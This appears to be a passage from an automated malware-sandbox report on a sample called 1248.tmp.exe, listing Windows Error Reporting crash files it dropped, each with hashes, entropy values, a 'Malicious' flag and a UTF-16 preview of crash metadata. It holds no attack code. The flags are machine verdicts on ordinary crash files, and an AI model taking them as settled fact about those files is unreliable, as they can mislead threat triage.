                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.0.1.8.9.2.8.2.9.0.3.0.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.3.9.c.7.3.7.a.-.f.e.9.0.-.4.8.4.8.-.b.6.5.f.-.6.f.0.8.a.1.c.0.b.7.5.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.5.7.8.c.3.3.9.-.0.0.1.d.-.4.b.2.7.-.8.0.7.b.-.6.1.9.1.2.a.f.6.c.f.7.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.2.4.8...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.8.4.-.0.0.0.1.-.0.0.1.4.-.7.e.b.a.-.1.a.0.8.e.6.1.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.1.a.0.a.4.a.d.6.b.6.9.9.d.e.3.b.6.1.c.a.3.8.9.6.4.4.8.b.f.8.0.0.0.0.f.f.f.f.!.0.0.0.0.7.2.f.1.a.2.4.5.1.2.1.2.e.d.1.f.9.0.3.5.0.9.a.e.5.2.6.9.c.2.9.f.6.c.8.a.0.4.7.0.!.1.2.4.8...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.1.0.:.0.6.:.0.8.:.2.5.!.0.!.1.2.4.8...t.m.p...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1248.tmp.exe_4e39193d21819bd6b87cb2ff431f9e213f49d70_77f415ec_6b0b31c9-e8d6-4254-8819-89614cbd0de4\Report.wer

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):65536
                                                                                                                                  Entropy (8bit):1.058150647392626
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:p0NQQZP056rYjsqZrP2HVLzuiFlZ24IO8s:WNQW856rYjlyLzuiFlY4IO8s
                                                                                                                                  MD5:FF814DB66E8B2D7A7C7AF41C091A8394
                                                                                                                                  SHA1:D33324B456845ABCE2CC4EA27BA77A413E22CC19
                                                                                                                                  SHA-256:39A2E304D5DDC13FDCF6DF7D37326C1D7E46C34D45152D7D2C4EDF497D12B9A3
                                                                                                                                  SHA-512:D29EB2C6903F05755ABE426897C02F3D1B889A73F9FF81F11D25F928B7CDEA266E1500AB218C4A55AF91FF49E83F521F2EC31231DD4305418DD25AC0B6BF0C56
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.0.1.8.9.5.6.9.1.6.5.6.9.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.b.0.b.3.1.c.9.-.e.8.d.6.-.4.2.5.4.-.8.8.1.9.-.8.9.6.1.4.c.b.d.0.d.e.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.0.2.9.a.c.5.3.-.b.4.6.7.-.4.3.d.4.-.b.6.5.e.-.4.3.8.0.1.6.0.0.6.d.5.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.2.4.8...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.8.4.-.0.0.0.1.-.0.0.1.4.-.7.e.b.a.-.1.a.0.8.e.6.1.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.1.a.0.a.4.a.d.6.b.6.9.9.d.e.3.b.6.1.c.a.3.8.9.6.4.4.8.b.f.8.0.0.0.0.f.f.f.f.!.0.0.0.0.7.2.f.1.a.2.4.5.1.2.1.2.e.d.1.f.9.0.3.5.0.9.a.e.5.2.6.9.c.2.9.f.6.c.8.a.0.4.7.0.!.1.2.4.8...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.1.0.:.0.6.:.0.8.:.2.5.!.0.!.1.2.4.8...t.m.p...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1248.tmp.exe_4e39193d21819bd6b87cb2ff431f9e213f49d70_77f415ec_8359e0e0-72aa-4488-9914-7cab62d1445d\Report.wer

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):65536
                                                                                                                                  Entropy (8bit):0.8963823522322811
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:1X/Gw0XNvZsdh+oA7Rh6tQXIDcQnc6rCcEhcw3rD+HbHg/wWGTf3hOycaGHh4vXc:1ANvZP056rYjsqZrP2ozuiFlZ24IO8s
                                                                                                                                  MD5:291611FA0D4D65007E18106185BF0139
                                                                                                                                  SHA1:CF5C86E29C1910276EF71A13577C7A8AE759ECF1
                                                                                                                                  SHA-256:EEBDFF7153C3521A8980481502003D0EFDE59CF4E67C2A885F6F492EE4585324
                                                                                                                                  SHA-512:B88401460562160419C87239DB3A6EDD496EA76C679CEE39C2B19D65AC65F05F4E231174E2DFBFE6FFA10A199A7BDEF2F646F2B60D23157752C7774DEFB9A8B7
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.0.1.8.9.2.9.7.2.8.2.1.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.5.9.e.0.e.0.-.7.2.a.a.-.4.4.8.8.-.9.9.1.4.-.7.c.a.b.6.2.d.1.4.4.5.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.5.9.7.6.2.1.-.6.1.2.2.-.4.3.7.e.-.a.1.d.5.-.c.6.d.7.c.2.1.9.2.0.c.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.2.4.8...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.8.4.-.0.0.0.1.-.0.0.1.4.-.7.e.b.a.-.1.a.0.8.e.6.1.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.1.a.0.a.4.a.d.6.b.6.9.9.d.e.3.b.6.1.c.a.3.8.9.6.4.4.8.b.f.8.0.0.0.0.f.f.f.f.!.0.0.0.0.7.2.f.1.a.2.4.5.1.2.1.2.e.d.1.f.9.0.3.5.0.9.a.e.5.2.6.9.c.2.9.f.6.c.8.a.0.4.7.0.!.1.2.4.8...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.1.0.:.0.6.:.0.8.:.2.5.!.0.!.1.2.4.8...t.m.p...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1248.tmp.exe_4e39193d21819bd6b87cb2ff431f9e213f49d70_77f415ec_cede04d0-9d34-4e82-9685-76716e88a59c\Report.wer

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):65536
                                                                                                                                  Entropy (8bit):1.045061735794946
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:9aNOZP056rYjsqZrP2HVXzuiFlZ24IO8s:sNo856rYjlyXzuiFlY4IO8s
                                                                                                                                  MD5:63E0A72A4E418663A5797D7A54F59197
                                                                                                                                  SHA1:121BE696098B5655BF3F99DB2F9192BF22132002
                                                                                                                                  SHA-256:50C2648FCBB7673A29853B7641361798EB098599EE670C320B9429CD1AE9E586
                                                                                                                                  SHA-512:2B96A4541FB0558FA798926A46A97514AB37B6694EC8574698C6E503B8811F49971A42244B6BF75A1379802F09792222095883A00FDEF7EEFF850833787FDEC7
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.0.1.8.9.5.3.5.8.5.9.2.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.d.e.0.4.d.0.-.9.d.3.4.-.4.e.8.2.-.9.6.8.5.-.7.6.7.1.6.e.8.8.a.5.9.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.4.8.a.7.6.b.4.-.2.c.b.6.-.4.9.5.3.-.8.5.3.9.-.7.f.7.b.7.8.2.8.9.2.8.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.2.4.8...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.8.4.-.0.0.0.1.-.0.0.1.4.-.7.e.b.a.-.1.a.0.8.e.6.1.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.1.a.0.a.4.a.d.6.b.6.9.9.d.e.3.b.6.1.c.a.3.8.9.6.4.4.8.b.f.8.0.0.0.0.f.f.f.f.!.0.0.0.0.7.2.f.1.a.2.4.5.1.2.1.2.e.d.1.f.9.0.3.5.0.9.a.e.5.2.6.9.c.2.9.f.6.c.8.a.0.4.7.0.!.1.2.4.8...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.1.0.:.0.6.:.0.8.:.2.5.!.0.!.1.2.4.8...t.m.p...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1248.tmp.exe_4e39193d21819bd6b87cb2ff431f9e213f49d70_77f415ec_d363ebdb-7f3a-4eda-a89a-800a55f6cd55\Report.wer

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):65536
                                                                                                                                  Entropy (8bit):0.9449730877786962
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:zjw0XNTZsdh+oA7Rh6tQXIDcQnc6rCcEhcw3rD+HbHg/wWGTf3hOycaGHh4vXNtF:LNTZP056rYjsqZrP2rzuiFlZ24IO8s
                                                                                                                                  MD5:32AD9975C4F43B16912D7192E2E629E1
                                                                                                                                  SHA1:C5CEE7952DD725679400A9650380114A4854386C
                                                                                                                                  SHA-256:D96CF2195F048D3BA66C79854B6E3A120C2554727FC8BBE6692B3B210A1B65FA
                                                                                                                                  SHA-512:2791A1DB795FE8EAC403B116FEE9B9DD69A72437C129D0A2A9744CE4CDE794316EE32CF68EAF1C915F1313D2620D30AC80B1B35675FF69F917D631FC52C4831F
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.0.1.8.9.3.3.1.0.1.7.1.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.6.3.e.b.d.b.-.7.f.3.a.-.4.e.d.a.-.a.8.9.a.-.8.0.0.a.5.5.f.6.c.d.5.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.7.6.e.d.2.5.-.a.c.d.3.-.4.3.e.a.-.a.2.2.e.-.4.a.e.e.e.1.3.6.2.0.e.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.2.4.8...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.8.4.-.0.0.0.1.-.0.0.1.4.-.7.e.b.a.-.1.a.0.8.e.6.1.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.1.a.0.a.4.a.d.6.b.6.9.9.d.e.3.b.6.1.c.a.3.8.9.6.4.4.8.b.f.8.0.0.0.0.f.f.f.f.!.0.0.0.0.7.2.f.1.a.2.4.5.1.2.1.2.e.d.1.f.9.0.3.5.0.9.a.e.5.2.6.9.c.2.9.f.6.c.8.a.0.4.7.0.!.1.2.4.8...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.1.0.:.0.6.:.0.8.:.2.5.!.0.!.1.2.4.8...t.m.p...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1248.tmp.exe_4e39193d21819bd6b87cb2ff431f9e213f49d70_77f415ec_d432c881-a463-40c8-be88-3e0a8b8825ef\Report.wer

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):65536
                                                                                                                                  Entropy (8bit):1.0644061618262557
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:lLwcNQZP056rYjsqZrP2HVBzuiFlZ24IO8s:lMcNW856rYjlyBzuiFlY4IO8s
                                                                                                                                  MD5:45DD12DF322F7F3DF9F22C50AE124447
                                                                                                                                  SHA1:C70E6889275656828C35472B7A3EF5111B1E5945
                                                                                                                                  SHA-256:BDBE37E4CDA79F83DB80DAE7E0A98FD924C2DDC57D2AFDC357D997488B0CC1A7
                                                                                                                                  SHA-512:F5460D48753ECD2510F7E70967887A378AFC465650E91FA3DFA6495970FAA85300BE54CA9AD9331AF0F7F5CEE91322C3D42F7AF9312B50E1CD7206C9D1CC28EE
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.0.1.8.9.5.7.6.4.6.7.3.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.4.3.2.c.8.8.1.-.a.4.6.3.-.4.0.c.8.-.b.e.8.8.-.3.e.0.a.8.b.8.8.2.5.e.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.7.7.c.2.5.a.-.3.3.d.b.-.4.2.a.9.-.9.a.c.0.-.4.2.f.0.a.a.7.7.8.3.b.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.2.4.8...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.8.4.-.0.0.0.1.-.0.0.1.4.-.7.e.b.a.-.1.a.0.8.e.6.1.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.1.a.0.a.4.a.d.6.b.6.9.9.d.e.3.b.6.1.c.a.3.8.9.6.4.4.8.b.f.8.0.0.0.0.f.f.f.f.!.0.0.0.0.7.2.f.1.a.2.4.5.1.2.1.2.e.d.1.f.9.0.3.5.0.9.a.e.5.2.6.9.c.2.9.f.6.c.8.a.0.4.7.0.!.1.2.4.8...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.1.0.:.0.6.:.0.8.:.2.5.!.0.!.1.2.4.8...t.m.p...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1248.tmp.exe_4e39193d21819bd6b87cb2ff431f9e213f49d70_77f415ec_d6487480-510f-4673-933e-cf8047f959ef\Report.wer

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):65536
                                                                                                                                  Entropy (8bit):0.9186034491828423
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:/zUN0ZP056rYjsqZrP2PzuiFlZ24IO8s:/zUNS856rYjlAzuiFlY4IO8s
                                                                                                                                  MD5:0A4B85CA32F4B6C342AE0B9A817879AA
                                                                                                                                  SHA1:A26D95E1ADCABAD514058B531A61B4CC75238ED2
                                                                                                                                  SHA-256:1B178A0E9D65A500B713817B2253DB27061F97957DE462C6D22555D05572609D
                                                                                                                                  SHA-512:6C0725BA11BA0A3706C0D4C8EBEC20F2C1A1565E6E18C10BB6A4255A0296B697D72477B6A6E613E40225E5D1EFF597645B8C09892C1393614DEE145B0B9B37BA
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.0.1.8.9.3.1.1.5.7.8.0.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.6.4.8.7.4.8.0.-.5.1.0.f.-.4.6.7.3.-.9.3.3.e.-.c.f.8.0.4.7.f.9.5.9.e.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.9.8.d.5.4.f.1.-.a.3.6.0.-.4.9.9.3.-.a.e.c.8.-.b.8.1.3.5.0.9.6.8.e.e.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.2.4.8...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.8.4.-.0.0.0.1.-.0.0.1.4.-.7.e.b.a.-.1.a.0.8.e.6.1.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.1.a.0.a.4.a.d.6.b.6.9.9.d.e.3.b.6.1.c.a.3.8.9.6.4.4.8.b.f.8.0.0.0.0.f.f.f.f.!.0.0.0.0.7.2.f.1.a.2.4.5.1.2.1.2.e.d.1.f.9.0.3.5.0.9.a.e.5.2.6.9.c.2.9.f.6.c.8.a.0.4.7.0.!.1.2.4.8...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.1.0.:.0.6.:.0.8.:.2.5.!.0.!.1.2.4.8...t.m.p...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1248.tmp.exe_4e39193d21819bd6b87cb2ff431f9e213f49d70_77f415ec_f90b9308-b38f-4c25-8d4a-547a2ff60645\Report.wer

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):65536
                                                                                                                                  Entropy (8bit):0.896438936994328
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:gKw0XN5Zsdh+oA7Rh6tQXIDcQnc6rCcEhcw3rD+HbHg/wWGTf3hOycaGHh4vXNtk:ZN5ZP056rYjsqZrP2ozuiFlZ24IO8s
                                                                                                                                  MD5:A101E6690CEE524BFD2EECD6C04D99C4
                                                                                                                                  SHA1:F046A060DA5059ACD5A76FAA347C62F0158C1CB7
                                                                                                                                  SHA-256:0F84D4E75D09E7BA00823C11C206047236714BE0E0726C48EAE2060D41006C65
                                                                                                                                  SHA-512:62CB98990FC5B666A2C292E61D0F2B3FE3AFC00CD8713E6E24CB4DBF3EB611C0E29A4F69CAD8C3992AB3FB96D029D2A06E8F8F11D3B6A7DE9B04051EAAE94AAA
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.0.1.8.9.2.7.3.0.9.0.3.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.0.b.9.3.0.8.-.b.3.8.f.-.4.c.2.5.-.8.d.4.a.-.5.4.7.a.2.f.f.6.0.6.4.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.2.3.a.d.a.4.6.-.2.8.0.c.-.4.4.8.e.-.a.2.d.2.-.6.4.f.6.1.d.6.e.5.3.d.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.2.4.8...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.8.4.-.0.0.0.1.-.0.0.1.4.-.7.e.b.a.-.1.a.0.8.e.6.1.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.1.a.0.a.4.a.d.6.b.6.9.9.d.e.3.b.6.1.c.a.3.8.9.6.4.4.8.b.f.8.0.0.0.0.f.f.f.f.!.0.0.0.0.7.2.f.1.a.2.4.5.1.2.1.2.e.d.1.f.9.0.3.5.0.9.a.e.5.2.6.9.c.2.9.f.6.c.8.a.0.4.7.0.!.1.2.4.8...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.1.0.:.0.6.:.0.8.:.2.5.!.0.!.1.2.4.8...t.m.p...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1248.tmp.exe_93bb37d58b3b7f3fe667f9fd44322af864d427_77f415ec_2a89c714-2b8b-4233-adee-0a4847350064\Report.wer

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):65536
                                                                                                                                  Entropy (8bit):1.1466822137977208
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:VaNCZy0cVThjsqZrP2HV3mzuiFUZ24IO8s:VaN05cVThjlyWzuiFUY4IO8s
                                                                                                                                  MD5:34749B028620D1718BA76CD0F3E1C621
                                                                                                                                  SHA1:07DB2D5572833FC1F3B709D9D20E9AFEBE8C6BBF
                                                                                                                                  SHA-256:6BC485365F2D4C7AC5BE12034E75F041F0E1FF4D44BE234EA8B9163CD8558EA3
                                                                                                                                  SHA-512:FA295D048C8794C61A081CE0FF5C9CF205AA6F00CF9B937B34763A86CDBAA2B6C061A72624E616A4D48C2796C321E6B08E26A0C94CC5DA9561AEB00528286CD1
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.0.1.8.9.5.9.7.3.4.8.5.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.a.8.9.c.7.1.4.-.2.b.8.b.-.4.2.3.3.-.a.d.e.e.-.0.a.4.8.4.7.3.5.0.0.6.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.b.f.1.2.2.3.f.-.5.a.d.7.-.4.6.4.8.-.8.a.f.9.-.d.0.6.b.5.9.6.4.e.7.7.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.2.4.8...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.8.4.-.0.0.0.1.-.0.0.1.4.-.7.e.b.a.-.1.a.0.8.e.6.1.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.1.a.0.a.4.a.d.6.b.6.9.9.d.e.3.b.6.1.c.a.3.8.9.6.4.4.8.b.f.8.0.0.0.0.f.f.f.f.!.0.0.0.0.7.2.f.1.a.2.4.5.1.2.1.2.e.d.1.f.9.0.3.5.0.9.a.e.5.2.6.9.c.2.9.f.6.c.8.a.0.4.7.0.!.1.2.4.8...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.1.0.:.0.6.:.0.8.:.2.5.!.0.!.1.2.4.8...t.m.p...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1361.tmp.dmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Thu Oct 10 07:28:49 2024, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):95080
                                                                                                                                  Entropy (8bit):1.7715461273692412
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:2g5rDeYegEgfzTK/eGuq9DYBnqKI2jdZ7ucOrvFs6yLs2B:x5XeVgEwi2GuIsJqKI2jbeaIE
                                                                                                                                  MD5:1F5CE86D96AC9BC8C64CC2537722CE3F
                                                                                                                                  SHA1:0D8DC2288EAD66CFDA0EF4DEE1FF7E8422F8461A
                                                                                                                                  SHA-256:77370085D541BCB3949E37017EF6C05D1A96AC837CE20F8669F62C7AC4EED64C
                                                                                                                                  SHA-512:14BFD3BE278B216509E8DC4F43404DB2CBA889CF25A2107969DD8FB26A428188B42F2B3B7C758AC9EE5EE057F66A089FBE1F5C0CEC4393789A68B095384A1885
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:MDMP..a..... .......1..g............T...........P...\...........87..........T.......8...........T............!..pQ......................................................................................................eJ......0.......GenuineIntel............T...........)..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER144D.tmp.WERInternalMetadata.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8404
                                                                                                                                  Entropy (8bit):3.696882492379089
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:R6l7wVeJ156gj6YVtk6pPsGgmfLYspB089bu6sfz6m:R6lXJL6gj6Y06LgmfLnuZf/
                                                                                                                                  MD5:647F56D7BA12E58795361919B1BF2ECC
                                                                                                                                  SHA1:BA54BD34879AEECF9D95AC156945ACD0B14D736A
                                                                                                                                  SHA-256:6C13D90F61757B70033962123C3CADEF57CD04E1048E8D84F0A7D0C1E297FD4D
